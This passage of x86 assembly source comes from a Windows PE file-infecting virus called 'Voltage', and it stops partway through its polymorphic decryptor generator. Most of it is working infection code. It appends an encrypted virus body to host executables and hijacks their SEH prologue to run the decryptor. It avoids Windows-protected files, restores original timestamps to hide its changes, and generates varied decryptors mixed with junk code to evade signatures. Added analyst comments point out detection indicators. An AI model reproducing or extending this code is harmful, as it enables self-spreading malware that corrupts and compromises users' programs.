push eax ;\
xor edx,edx ; \
div ecx ;-->align section size
sub ecx,edx ; /
pop dword ptr [ebx + 10h] ;/
add dword ptr [ebx + 10h],ecx ;set new section size of raw data
push eax
mov [ebp + FixRVA],0 ;add VirtualSize-PointerToRawData
mov eax,[ebx + 0ch] ;subtraction to the virus offset
sub eax,[ebx + 14h] ;when decrypting and jumping to
mov [ebp + FixRVA],eax ;virus at runtime.
pop eax
mov eax,[ebx + 14h] ;get section raw data rva
add eax,[ebp + mapbase] ;convert it to va
add eax,[ebx + 8h] ;goto end of section
sub eax,VirusSize
mov [ebp + StartOfDataToEncrypt],eax;set the virus start offset
xchg edi,eax
call [ebp + GetTickCount]
mov byte ptr [ebp + XorKey],al ;set random key
push edi ;virus in infected files
push eax ;tick count
lea esi,[ebp + _main]
mov ecx,VirusSize
rep movsb ;copy virus into host
pop eax
pop edi
mov ecx,EncryptedVirus
add edi,EncryptionStart
encrypt:xor byte ptr [edi],al
inc edi
loop encrypt
call CreateDecryptor ;create polymorphic decryptor
pop ebx ;restore pe header
mov eax,[ebx + 50h] ;get size of image
add eax,VirusSize
push eax
xor edx,edx
mov ecx,[ebx + 38h] ;get section alignment
div ecx
sub ecx,edx
pop eax
add eax,ecx ;align size of image
mov dword ptr [ebx + 50h],eax ;set new size of image
inc byte ptr [ebp + Infection_Success]
call PadFileSize
ExitCloseF:
call CloseFile
ExitInfect:
call RestoreFileAttributes
ret
ExitWithoutInfection:
call RestoreFileSize
call CloseFile
call RestoreFileAttributes
ret
Infection_Success db 0
;scan a code region for the mov eax,fs:[00000000] instruction and
;patch it with a call virus_decryptor plus an inc ebx instruction
;input:
;eax - address of code
;ecx - size of code to scan
;output:
;carry flag - success/fail.
;-----------------------------------------------------------------------
; ScanAndPatch
; Looks for the 6-byte sequence 64 A1 00 00 00 00 (mov eax,fs:[0], the
; start of a typical compiler SEH prologue) and, at the first hit only,
; overwrites it in place with E8 rel32 (call <decryptor>) + 43 (inc ebx):
; same 6-byte length, so the host prologue now transfers control to the
; decryptor. The effect of the 1-byte 'inc ebx' filler at runtime is not
; visible here.
; In:   eax = first byte to scan (inside the mapped file), ecx = byte count
;       [ebp+WhereToWriteDecryptor], [ebp+mapbase]
; Out:  CF=1 patched, CF=0 pattern not found
; Clobb: eax, ebx, ecx, flags
; Note: each compare reads up to 6 bytes at [eax], so the last five
; iterations read past the end of the scanned region.
; Analyst note: a hook indicator is E8 followed by 43 where a host entry
; would normally carry 64 A1 00 00 00 00, with the call target in the
; last section.
;-----------------------------------------------------------------------
ScanAndPatch:
__1: cmp word ptr [eax],0a164h ;bytes 64 A1 = fs: prefix + mov eax,moffs32
jne nxt_w
cmp dword ptr [eax + 2h],0 ;moffs32 == 0 -> it is mov eax,fs:[0]
jne nxt_w
mov byte ptr [eax],0e8h ;E8 = call rel32, overwrites the first byte
mov ebx,[ebp + WhereToWriteDecryptor] ;decryptor address in the mapping
push eax
sub eax,[ebp + mapbase] ;eax = file offset of the patch site
sub ebx,eax ;ebx = decryptor - patch site ...
sub ebx,5h ;... - 5 (length of the call) = rel32
sub ebx,[ebp + mapbase] ;turn the decryptor address into a file offset as well
pop eax
mov dword ptr [eax + 1h],ebx ;rel32 computed from file offsets; assumes both sites share the same offset-to-RVA delta - confirm
mov byte ptr [eax + 5h],43h ;43 = inc ebx, fills the sixth byte of the slot
jmp patchok ;patch only one time.
nxt_w: inc eax
loop __1
jmp nopatch
patchok:stc ;CF=1: patched
ret
nopatch:clc ;CF=0: pattern not found
ret
;input:nothing
;output:carry flag:
;1=protected
;0=not protected
;-----------------------------------------------------------------------
; CheckSFPFile
; Asks Windows File Protection (sfc.dll!SfcIsFileProtected) whether
; [ebp+FileToInfect] is a protected system file so such files are skipped.
; The routine runs under a frame-based SEH handler (SFP_Check_Error_Handler)
; so any fault unwinds straight back to the caller.
; In:   [ebp+FileToInfect] = ASCIIZ path
; Out:  CF as the code actually sets it:
;         CF=1 at NotProtected  -> sfc.dll absent, export missing, or the
;                                  file is not protected (caller proceeds)
;         CF=0 at SFP_Err       -> path conversion failed or file IS protected
;         CF=0 from the handler -> an exception occurred
;       (the comment block above this routine gives the opposite polarity;
;        the code is authoritative)
;       General registers are preserved (pushad/popad).
; Uses: [ebp+hSfc], [ebp+SfcIsFileProtected], [ebp+Unicode_Path]
; Analyst note: because WFP-protected files are skipped, WFP restore
; events are not a useful indicator for this infector on 2000/XP.
;-----------------------------------------------------------------------
CheckSFPFile:
pushad
lea eax,[ebp + SFP_Check_Error_Handler]
push eax ;EXCEPTION_REGISTRATION.handler
xor eax,eax
push dword ptr fs:[eax] ;EXCEPTION_REGISTRATION.prev = current fs:[0]
mov fs:[eax],esp ;install the frame
lea eax,[ebp + SFC_DLL]
push eax
call [ebp + LoadLibrary] ;LoadLibrary("SFC.DLL")
cmp eax,0h ;sfc here ?
je NotProtected ;no sfc.dll -> not 2000/XP, nothing to check
mov [ebp + hSfc],eax ;save module handle
lea ebx,[ebp + _SfcIsFileProtected]
push ebx
push eax ;sfc module handle
call [ebp + __GetProcAddress] ;GetProcAddress(hSfc,"SfcIsFileProtected")
cmp eax,0h ;function not found ?
je NotProtected ;(hSfc is not released on this path)
mov [ebp + SfcIsFileProtected],eax ;save function address
lea esi,[ebp + Unicode_Path]
xor eax,eax
mov ecx,200h
@blankU:stosb ;stores 0x200 zero bytes through edi (the buffer address above went into esi)
loop @blankU
push 200h ;cchWideChar = 0x200 (a WCHAR count)
lea eax,[ebp + Unicode_Path]
push eax ;lpWideCharStr
push -1 ;cbMultiByte = -1: input is NUL terminated
lea eax,[ebp + FileToInfect]
push eax ;lpMultiByteStr
xor eax,eax
push eax ;dwFlags = 0
push eax ;CodePage = CP_ACP (0)
call [ebp + MultiByteToWideChar] ;convert path into unicode
cmp eax,0h ;fail ?
je SFP_Err ;dont infect
lea eax,[ebp + Unicode_Path]
push eax ;ProtFileName (LPCWSTR)
push 0h ;RpcHandle = NULL
call [ebp + SfcIsFileProtected] ;check if file is protected
cmp eax,0h ;is file protected ?
jne SFP_Err ;TRUE -> protected, skip it
push dword ptr [ebp + hSfc]
call [ebp + FreeLibrary] ;free sfc library
NotProtected:
pop dword ptr fs:[0] ;remove SEH (restore previous handler)
add esp,4h ;discard our handler address
popad
stc ;CF=1: proceed with this file
ret
SFP_Err: ;protected, or the path conversion failed
push dword ptr [ebp + hSfc]
call [ebp + FreeLibrary] ;free sfc library
pop dword ptr fs:[0] ;remove SEH
add esp,4h
popad
clc ;CF=0: skip this file
ret
SFP_Check_Error_Handler:
;SEH callback. [esp+8] = EstablisherFrame = the esp value saved by
;'mov fs:[eax],esp' above. Rather than returning a disposition, it rewinds
;esp to that frame, unregisters, and returns to CheckSFPFile's caller with CF=0.
mov esp,[esp + 8h]
pop dword ptr fs:[0] ;remove SEH
add esp,4h
popad
clc ;CF=0: treat an exception as "do not touch this file"
ret
SFC_DLL db "SFC.DLL",0
hSfc dd 0
_SfcIsFileProtected db "SfcIsFileProtected",0
SfcIsFileProtected dd 0
Unicode_Path db 200h dup(0) ;200=2 max_path
CP_ACP equ 0
;-----------------------------------------------------------------------
; RemoveFileAttributes
; Saves the target's attribute bits in [ebp+OldFileAttribute] and resets
; them to FILE_ATTRIBUTE_NORMAL so a read-only/hidden/system file can be
; opened for writing; RestoreFileAttributes puts the saved bits back.
; In:   [ebp+FileToInfect] = ASCIIZ path
; Out:  [ebp+OldFileAttribute]
; Clobb: eax (and ecx, edx by the API calls), flags
; Note: the GetFileAttributes result is stored unchecked.
;-----------------------------------------------------------------------
RemoveFileAttributes:
lea eax,[ebp + FileToInfect]
push eax
call [ebp + GetFileAttributes]
mov [ebp + OldFileAttribute],eax ;remember the original attributes
push FILE_ATTRIBUTE_NORMAL
lea eax,[ebp + FileToInfect]
push eax
call [ebp + SetFileAttributes] ;clear read-only/hidden/system for the write
ret
OldFileAttribute dd 0
;-----------------------------------------------------------------------
; RestoreFileAttributes
; Re-applies the attribute bits saved by RemoveFileAttributes.
; In:   [ebp+FileToInfect], [ebp+OldFileAttribute]
; Clobb: eax (and ecx, edx by the API call), flags
;-----------------------------------------------------------------------
RestoreFileAttributes:
push dword ptr [ebp + OldFileAttribute]
lea eax,[ebp + FileToInfect]
push eax
call [ebp + SetFileAttributes]
ret
;-----------------------------------------------------------------------
; PadFileSize
; Sets the file length to pad_size(eax): the caller-supplied size rounded
; up to a multiple of 0x65 (101), which is the infection marker OpenFile
; checks for.
; In:   eax = size to align (caller supplied; at the visible call site it
;       holds the value just stored as the PE SizeOfImage - confirm)
;       [ebp+hfile]
; Clobb: eax, ecx, edx, flags
;-----------------------------------------------------------------------
PadFileSize:
call pad_size ;eax = size rounded up to a multiple of 101
push FILE_BEGIN ;dwMoveMethod
push 0h ;lpDistanceToMoveHigh = NULL
push eax ;lDistanceToMove = aligned size
push dword ptr [ebp + hfile]
call [ebp + SetFilePointer]
push dword ptr [ebp + hfile]
call [ebp + SetEndOfFile] ;truncate/extend the file to the aligned size
ret
;-----------------------------------------------------------------------
; RestoreFileSize
; Truncates the file back to [ebp+FileSize] (its original length), undoing
; the VirusSize extension caused by CreateFileMapping in OpenFile; used on
; the abort path (ExitWithoutInfection).
; In:   [ebp+hfile], [ebp+FileSize]
; Clobb: eax, ecx, edx (API calls), flags
;-----------------------------------------------------------------------
RestoreFileSize:
push FILE_BEGIN ;dwMoveMethod
push 0h ;lpDistanceToMoveHigh = NULL
push dword ptr [ebp + FileSize] ;original length
push dword ptr [ebp + hfile]
call [ebp + SetFilePointer]
push dword ptr [ebp + hfile]
call [ebp + SetEndOfFile] ;cut the file back to its original size
ret
;-----------------------------------------------------------------------
; CloseFile
; Unmaps the view and closes the mapping, writes the three FILETIMEs
; captured by OpenFile back onto the file, then closes the file handle.
; In:   [ebp+mapbase], [ebp+hmap], [ebp+hfile],
;       CreationTime / LastAccessTime / LastWriteTime
; Clobb: eax (and ecx, edx by the API calls), flags
; Analyst note: the original timestamps are restored, so modification-time
; based integrity checks do not see the change; the file size (grown by
; VirusSize and padded to a multiple of 0x65) and content hashes do.
;-----------------------------------------------------------------------
CloseFile:
push dword ptr [ebp + mapbase]
call [ebp + UnMapViewOfFile] ;flush and release the view
push dword ptr [ebp + hmap]
call [ebp + CloseHandle] ;close the section object
lea eax,[ebp + LastWriteTime]
push eax ;lpLastWriteTime
lea eax,[ebp + LastAccessTime]
push eax ;lpLastAccessTime
lea eax,[ebp + CreationTime]
push eax ;lpCreationTime
push dword ptr [ebp + hfile]
call [ebp + SetFileTime] ;put the saved timestamps back
push dword ptr [ebp + hfile]
call [ebp + CloseHandle]
ret
;-----------------------------------------------------------------------
; OpenFile
; Opens [ebp+FileToInfect] read/write (exclusive), applies the size
; filters, tests the "already infected" marker, records the file times and
; maps the file with VirusSize extra bytes so the body can be appended in
; place.
; In:   [ebp+FileToInfect] = ASCIIZ path
; Out:  CF=1 -> open and mapped: [ebp+hfile], [ebp+hmap], [ebp+mapbase],
;                [ebp+FileSize] and the three FILETIMEs are set
;       CF=0 -> skipped or failed; every handle opened here is closed
; Side effect: CreateFileMapping with FileSize+VirusSize extends the file
;       on disk; RestoreFileSize exists to undo that when infection is
;       aborted.
; Clobb: eax, ecx, edx, flags
; Analyst notes:
;   - size window: 0x2800 (10 KiB) <= size <= 0x300000 (3 MiB)
;   - infection marker: file length is a multiple of 0x65 (101); a clean
;     file whose size happens to divide by 101 is skipped as well
;   - dwShareMode = 0, so a file open elsewhere fails CreateFile
;-----------------------------------------------------------------------
OpenFile:
xor eax,eax
push eax ;hTemplateFile = NULL
push FILE_ATTRIBUTE_NORMAL ;dwFlagsAndAttributes
push OPEN_EXISTING ;dwCreationDisposition
push eax ;lpSecurityAttributes = NULL
push eax ;dwShareMode = 0 (exclusive)
push GENERIC_READ or GENERIC_WRITE ;dwDesiredAccess
lea eax,[ebp + FileToInfect]
push eax ;lpFileName
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je OpenFileErr
mov dword ptr [ebp + hfile],eax
push 0h ;lpFileSizeHigh = NULL (high dword ignored)
push eax
call [ebp + GetFileSize]
cmp eax,0ffffffffh ;INVALID_FILE_SIZE
je FileSizeErr
mov dword ptr [ebp + FileSize],eax
cmp eax,2800h ;below 10 KiB: skip
jb FileSizeErr
cmp eax,300000h ;above 3 MiB: skip
ja FileSizeErr
call pad_size ;edx = bytes needed to reach the next multiple of 0x65
cmp edx,0h ;0 -> size already a multiple of 0x65 = infection marker
jne ___1
inc byte ptr [ebp + Infection_Success] ;already infected: reported like a success (presumably so the caller moves on)
jmp FileSizeErr
___1: lea eax,[ebp + LastWriteTime]
push eax ;lpLastWriteTime
lea eax,[ebp + LastAccessTime]
push eax ;lpLastAccessTime
lea eax,[ebp + CreationTime]
push eax ;lpCreationTime
push dword ptr [ebp + hfile]
call [ebp + GetFileTime] ;saved so CloseFile can restore the timestamps
xor eax,eax
push eax ;lpName = NULL
push dword ptr [ebp + FileSize]
add dword ptr [esp],VirusSize ;dwMaximumSizeLow = FileSize + VirusSize (extends the file)
push eax ;dwMaximumSizeHigh = 0
push PAGE_READWRITE ;flProtect
push eax ;lpAttributes = NULL
push dword ptr [ebp + hfile]
call [ebp + CreateFileMapping]
cmp eax,0h
je FileSizeErr
mov dword ptr [ebp + hmap],eax
push dword ptr [ebp + FileSize]
add dword ptr [esp],VirusSize ;dwNumberOfBytesToMap = FileSize + VirusSize
xor eax,eax
push eax ;dwFileOffsetLow = 0
push eax ;dwFileOffsetHigh = 0
push FILE_MAP_WRITE ;dwDesiredAccess
push dword ptr [ebp + hmap]
call [ebp + MapViewOfFile]
cmp eax,0h
je MapFileErr
mov dword ptr [ebp + mapbase],eax ;base of the writable view
stc ;CF=1: success
ret
MapFileErr:
push dword ptr [ebp + hmap]
call [ebp + CloseHandle] ;mapping created but view failed
FileSizeErr:
push dword ptr [ebp + hfile]
call [ebp + CloseHandle] ;file open but rejected/failed
OpenFileErr:
clc ;CF=0: skipped or failed
ret
FileSize dd 0
hfile dd 0
hmap dd 0
mapbase dd 0
CreationTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0
IF DEBUG
warning db "Warning!!!:Voltage virus is going to infect this file,press yes to infect",0
ENDIF
FILE_ATTRIBUTE_NORMAL equ 00000080h
OPEN_EXISTING equ 3
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
INVALID_HANDLE_VALUE equ -1
PAGE_READWRITE equ 4h
FILE_MAP_WRITE equ 00000002h
FILE_BEGIN equ 0
MB_YESNO equ 00000004h
IDYES equ 6
;eax - file size
;-----------------------------------------------------------------------
; pad_size
; Rounds a size up to the next multiple of 0x65 (101). This alignment is
; the infection marker: OpenFile treats a file whose size is already a
; multiple of 101 as infected (so roughly 1 in 101 clean files is skipped).
; In:   eax = size
; Out:  eax = size rounded up (unchanged if already aligned)
;       edx = number of padding bytes added (0 if none)
; Clobb: ecx, flags
;-----------------------------------------------------------------------
pad_size:
push eax
xor edx,edx ;edx:eax / ecx
mov ecx,65h ;101d
div ecx ;edx = size mod 101
cmp edx,0h
je no_pad ;exact multiple: edx stays 0
sub ecx,edx ;ecx = 101 - remainder = bytes to add
xchg ecx,edx ;edx = bytes to add (ecx = remainder, unused)
no_pad: pop eax
add eax,edx ;eax = aligned size
ret
;Voltage PolyMorphic Engine:
;---------------------------
;encrypt code with a 4-byte key in a different way each time
;and create a polymorphic decryptor; the polymorphic decryptor
;uses different instructions that do the same thing, mixed with
;junk code.
;-----------------------------------------------------------------------
; CreateDecryptor  (polymorphic engine entry point)
; 1. picks one of four dword transforms (not/add/sub/xor) from a random
;    number,
; 2. draws a 32-bit key and applies the transform in place to the
;    SizeOfDataToEncrypt dwords at [ebp+StartOfDataToEncrypt] (the body
;    already copied into the mapped host), and
; 3. emits the matching decryptor at [ebp+WhereToWriteDecryptor] as nine
;    instruction groups (WriteInstruction1..9), each followed by junk from
;    WriteJunkCode. The output cursor after group 4 is kept in
;    [ebp+PolyBuffer] (author: "saved for loop" - presumably the loop-back
;    target used by a later group; groups 5..9 are outside this view).
; In:   [ebp+StartOfDataToEncrypt], [ebp+WhereToWriteDecryptor]
; Out:  [ebp+EncryptionMethod], [ebp+key], [ebp+PolyBuffer];
;       edi = end of the generated decryptor
; Clobb: eax, ebx (via helpers), ecx, esi, edi, flags
; Analyst note: the transform set is fixed (four dword ops, 32-bit key)
; and every decryptor starts with pushad (60h); the variation lies in the
; register-setup encodings and the junk, so emulating the decryptor is
; more robust than byte signatures.
;-----------------------------------------------------------------------
CreateDecryptor:
call InitRandomNumber ;init random number generator
call GenRandomNumber
and eax,1f40h ;keeps the bits of 1F40h: one of 64 values in 0..8000
cmp eax,7d0h ;<= 2000 -> method 1
ja NextM
mov byte ptr [ebp + EncryptionMethod],1h ;use not
jmp EncryptVirus
NextM: cmp eax,0fa0h ;<= 4000 -> method 2
ja NextM2
mov byte ptr [ebp + EncryptionMethod],2h ;use add
jmp EncryptVirus
NextM2: cmp eax,1770h ;<= 6000 -> method 3
ja NextM3
mov byte ptr [ebp + EncryptionMethod],3h ;use sub
jmp EncryptVirus
NextM3: mov byte ptr [ebp + EncryptionMethod],4h ;use xor
EncryptVirus:
call GenRandomNumber
mov dword ptr [ebp + key],eax ;random 32-bit key (unused by method 1)
xor eax,eax
mov ecx,SizeOfDataToEncrypt ;loop count in dwords (VirusSize/4)
mov edi,[ebp + StartOfDataToEncrypt]
mov esi,edi ;in place: lodsd from esi, stosd to edi
@enc: lodsd
cmp byte ptr [ebp + EncryptionMethod],1h ;is not ?
jne NextE
not eax
jmp _stosw
NextE: cmp byte ptr [ebp + EncryptionMethod],2h ;is add ?
jne NextE2
add eax,dword ptr [ebp + key]
jmp _stosw
NextE2: cmp byte ptr [ebp + EncryptionMethod],3h ;is sub ?
jne NextE4
sub eax,dword ptr [ebp + key]
jmp _stosw
NextE4: xor eax,dword ptr [ebp + key] ;method 4: xor
_stosw: stosd ;label says 'stosw' but a dword is stored
loop @enc
mov edi,[ebp + WhereToWriteDecryptor] ;edi = output cursor for the decryptor
call WriteInstruction1 ;pushad
call WriteJunkCode
call WriteInstruction2 ;esi = runtime VA of the encrypted body
call WriteJunkCode
call WriteInstruction3 ;edi = esi
call WriteJunkCode
call WriteInstruction4 ;ecx = dword count
call WriteJunkCode
mov dword ptr [ebp + PolyBuffer],edi ;saved for loop (cursor after group 4)
call WriteInstruction5 ;groups 5..9: not visible in this excerpt
call WriteJunkCode
call WriteInstruction6
call WriteJunkCode
call WriteInstruction7
call WriteJunkCode
call WriteInstruction8
call WriteJunkCode
call WriteInstruction9
call WriteJunkCode
ret
EncryptionMethod db 0 ;1=not 2=add 3=sub 4=xor
key dd 0
SizeOfDecryptor dd 0
WhereToWriteDecryptor dd 0
StartOfDataToEncrypt dd 0
ProgramImageBase dd 0
PolyBuffer dd 0
SizeOfDataToEncrypt equ (VirusSize/4);virus size in dwords
FixRVA dd 0
WriteInstruction1:
;-----------------------------------------------------------------------
; Emits the fixed decryptor lead-in: 60h = pushad (one byte, never varied).
; In:   edi = output cursor
; Out:  edi advanced by 1
; Clobb: none besides edi
;-----------------------------------------------------------------------
mov byte ptr [edi],60h ;pushad
inc edi
ret
WriteInstruction2:
;-----------------------------------------------------------------------
; Emits code that loads esi with the runtime virtual address of the
; encrypted body, in one of five randomly chosen encodings.
; The immediate is computed as
;   ebx = (StartOfDataToEncrypt - mapbase)   ; file offset of the body
;         + ProgramImageBase                  ; presumably the host ImageBase
;         + FixRVA                            ; VirtualAddress - PointerToRawData of the section
; In:   edi = output cursor; [ebp+StartOfDataToEncrypt], [ebp+mapbase],
;       [ebp+ProgramImageBase], [ebp+FixRVA]
; Out:  edi advanced past the emitted bytes
; Clobb: eax, ebx, flags (plus WriteJunkCode's; ebx is saved around it in
;       ways 3 and 4, which suggests WriteJunkCode does not preserve ebx)
; Variants (what a scanner/emulator has to accept):
;   1  BE imm32                      mov esi,imm32
;   2  68 imm32 [junk] 5E            push imm32 / pop esi
;   3  33 F6 [junk] 81 CE imm32      xor esi,esi / or esi,imm32
;   4  2B F6 [junk] 81 CE imm32      sub esi,esi / or esi,imm32
;   5  BE ~imm32 [junk] F7 D6        mov esi,not imm32 / not esi
;-----------------------------------------------------------------------
call GenRandomNumber
mov ebx,[ebp + StartOfDataToEncrypt]
sub ebx,[ebp + mapbase] ;mapped VA -> file offset
add ebx,[ebp + ProgramImageBase] ;+ image base
add ebx,[ebp + FixRVA] ;+ (VirtualAddress - PointerToRawData) -> runtime VA
and eax,0ffh ;0..255, split into five roughly equal bands
cmp eax,33h
ja ins2_1
mov byte ptr [edi],0beh ;way 1: BE imm32 =
mov dword ptr [edi + 1],ebx ;mov esi,StartOfDataToEncrypt
add edi,5h
jmp retins2
ins2_1: cmp eax,66h
ja ins2_2
mov byte ptr [edi],68h ;way 2: 68 imm32 =
mov dword ptr [edi + 1],ebx ;push StartOfDataToEncrypt
add edi,5h
call WriteJunkCode
mov byte ptr [edi],5eh ;5E = pop esi
inc edi
jmp retins2
ins2_2: cmp eax,99h
ja ins2_3
mov word ptr [edi],0f633h ;way 3: 33 F6 =
add edi,2h ;xor esi,esi
push ebx ;keep the immediate across WriteJunkCode
call WriteJunkCode
pop ebx
call _ins2oresival ;or esi,imm32
jmp retins2
ins2_3: cmp eax,0cch
ja ins2_4
mov word ptr [edi],0f62bh ;way 4: 2B F6 =
add edi,2h ;sub esi,esi
push ebx
call WriteJunkCode
pop ebx
call _ins2oresival ;or esi,imm32
jmp retins2
ins2_4: not ebx ;way 5: store the complemented address ...
mov byte ptr [edi],0beh ;BE imm32 = mov esi,not StartOfDataToEncrypt
mov dword ptr [edi + 1],ebx
add edi,5h
call WriteJunkCode
mov word ptr [edi],0d6f7h ;... F7 D6 = not esi restores it at runtime
add edi,2h
retins2:ret
_ins2oresival:
;-----------------------------------------------------------------------
; Emits 81 CE imm32 = or esi,imm32 with imm32 = ebx (6 bytes).
; Used by WriteInstruction2 ways 3 and 4 after esi was zeroed.
; In:   edi = output cursor, ebx = immediate
; Out:  edi advanced by 6
;-----------------------------------------------------------------------
mov word ptr [edi],0ce81h ;81 CE = or esi,imm32
mov dword ptr [edi + 2],ebx
add edi,6h
ret
WriteInstruction3:
;-----------------------------------------------------------------------
; Emits code whose net effect is edi = esi, in one of four encodings:
;   1  8B FE                     mov edi,esi
;   2  56 [junk] 5F              push esi / pop edi
;   3  87 FE [junk] 8B F7        xchg edi,esi / mov esi,edi
;   4  87 F7 [junk] 8B F7        xchg esi,edi (modrm reversed) / mov esi,edi
; Ways 3 and 4 are the same instruction pair with the xchg operands
; swapped; for the pair to be correct the junk in between presumably must
; leave esi and edi alone (WriteJunkCode is not visible here).
; Selection: the random byte is masked with 0C8h, so only the eight values
; 0,8,40h,48h,80h,88h,0C0h,0C8h occur - two per variant.
; In:   edi = output cursor
; Out:  edi advanced
; Clobb: eax, flags (plus WriteJunkCode's)
;-----------------------------------------------------------------------
call GenRandomNumber
and eax,0c8h ;only bits 3,6,7 kept
cmp eax,32h
ja ins3_1
mov word ptr [edi],0fe8bh ;way 1: 8B FE = mov edi,esi
add edi,2h
jmp retins3
ins3_1: cmp eax,64h
ja ins3_2
mov byte ptr [edi],56h ;way 2: 56 = push esi
inc edi
call WriteJunkCode
mov byte ptr [edi],5fh ;5F = pop edi
inc edi
jmp retins3
ins3_2: cmp eax,96h
ja ins3_3
mov word ptr [edi],0fe87h ;way 3: 87 FE = xchg edi,esi
add edi,2h
call WriteJunkCode
mov word ptr [edi],0f78bh ;8B F7 = mov esi,edi (restores esi)
add edi,2h
jmp retins3
ins3_3: mov word ptr [edi],0f787h ;way 4: 87 F7 = xchg esi,edi (same effect as way 3)
add edi,2h
call WriteJunkCode
mov word ptr [edi],0f78bh ;8B F7 = mov esi,edi
add edi,2h
retins3:ret
WriteInstruction4:
;-----------------------------------------------------------------------
; Emits code that loads ecx with SizeOfDataToEncrypt (the dword count of
; the encrypted body), in one of five encodings mirroring WriteInstruction2:
;   1  B9 imm32                      mov ecx,imm32
;   2  68 imm32 [junk] 59            push imm32 / pop ecx
;   3  33 C9 [junk] 81 C9 imm32      xor ecx,ecx / or ecx,imm32
;   4  2B C9 [junk] 81 C9 imm32      sub ecx,ecx / or ecx,imm32
;   5  B9 ~imm32 [junk] F7 D1        mov ecx,not imm32 / not ecx
; In:   edi = output cursor
; Out:  edi advanced
; Clobb: eax, ebx, flags (plus WriteJunkCode's; ebx is saved around it in
;       ways 3 and 4)
;-----------------------------------------------------------------------
call GenRandomNumber
mov ebx,SizeOfDataToEncrypt ;immediate for every variant
and eax,0ffh ;0..255, split into five roughly equal bands
cmp eax,33h
ja ins4_1
mov byte ptr [edi],0b9h ;way 1: B9 imm32 = mov ecx,sizeofvirusindwords
mov dword ptr [edi + 1],ebx
add edi,5h
jmp retins4
ins4_1: cmp eax,66h
ja ins4_2
mov byte ptr [edi],68h ;way 2: 68 imm32 = push sizeofvirusindwords
mov dword ptr [edi + 1],ebx
add edi,5h
call WriteJunkCode
mov byte ptr [edi],59h ;59 = pop ecx
inc edi
jmp retins4
ins4_2: cmp eax,99h
ja ins4_3
mov word ptr [edi],0c933h ;way 3: 33 C9 = xor ecx,ecx
add edi,2h
push ebx ;keep the immediate across WriteJunkCode
call WriteJunkCode
pop ebx
call _ins4orecxval ;or ecx,imm32
jmp retins4
ins4_3: cmp eax,0cch
ja ins4_4
mov word ptr [edi],0c92bh ;way 4: 2B C9 = sub ecx,ecx
add edi,2h
push ebx
call WriteJunkCode
pop ebx
call _ins4orecxval ;or ecx,imm32
jmp retins4
ins4_4: not ebx ;way 5: store the complemented count ...
mov byte ptr [edi],0b9h ;B9 imm32 = mov ecx,not sizeofvirusindwords
mov dword ptr [edi + 1],ebx
add edi,5h
call WriteJunkCode
mov word ptr [edi],0d1f7h ;... F7 D1 = not ecx restores it at runtime
add edi,2h
retins4:ret
_ins4orecxval:
;-----------------------------------------------------------------------
; Emits 81 C9 imm32 = or ecx,imm32 with imm32 = ebx (6 bytes).
; Used by WriteInstruction4 ways 3 and 4 after ecx was zeroed.
; In:   edi = output cursor, ebx = immediate
; Out:  edi advanced by 6
;-----------------------------------------------------------------------
mov word ptr [edi],0c981h ;81 C9 = or ecx,imm32
mov dword ptr [edi + 2],ebx
add edi,6h
ret
WriteInstruction5:
;this function read 4 bytes from [esi] into eax
;and add to esi registe